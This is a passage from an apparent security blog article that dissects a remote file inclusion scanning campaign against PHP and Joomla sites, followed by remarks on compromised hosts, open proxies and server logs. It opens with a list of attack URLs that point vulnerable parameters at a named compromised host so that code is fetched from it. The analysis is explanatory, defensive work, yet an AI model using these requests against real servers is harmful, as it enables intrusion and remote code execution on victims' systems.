http://abc.def.131.45//components/com_ezine/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45//components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45//components/com_mojo/wp-trackback.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/administrator/index.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/administrator/index0.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/administrator/index1.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/administrator/index2.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/administrator/index3.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/tools/calendar.php?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/redirect.php?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/rss.php?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/click.php?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/errors.php?error=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/images/errors.php?error=http://nic.bupt.edu.cn/dirname/filename
Where,
abc.def.131.45 is the current IP number being scanned,
nic.bupt.edu.cn is the OldVictim,
dirname is the directory name, where attacker has saved his code file (read dissections below),
filename is the TestFile (need not only for test purpose as mentioned above, read dissections below)
Author's Note: nic.bupt.edu.cn is intensively being used in real attacks while I was
writing this article. I intentionally blanked the directory and the file names.
How about the consumed resources? The consumed resources are not a problem for the attacker. Because all the resources spent (such as bandwidth, disk space, memory, CPU etc.) are not wasted from his own resources. They are all wasted from the resources of proxyserver and oldvictim. At the end, he got a list of the IP numbers available to exploit remotely. He may run the same algoritm for other IP range blocks, as he wishes.
Now let's examine what happened on each of the hosts mentioned above:
1- We know that oldvictim was already hacked. It is a lost host, indeed it is a harmful one. Someone should unplug it's network cable. As long as it is onthe network while hacked, it is used in damaging thousands of other hosts per hour, on the world. You can examine a current list of such websites at www.bizimbal.com/docs/ex0.html.
2- The proxyserver is probably an unattended host by an inexperienced system administrator who is not aware about what he is assisting. Actually, he is equally responsible for the attacks. Because he is the person who hides the real IP number of attacker. (I have some additional suspicions about some proxy serves.) So, close if you are running an open proxy web server unless running intentionally under your tight control. And remember, you have to keep all access logs for providing to legal authorities, in case of a serious crime.
3- The scanned hosts have only few rejected requests in their error_log with error code "404 Not found"
4- The ones which are exploitable, are hacked soon with the attacker's real codes loaded from the oldvictim or older oldvictim's
Tidak ada komentar:
Posting Komentar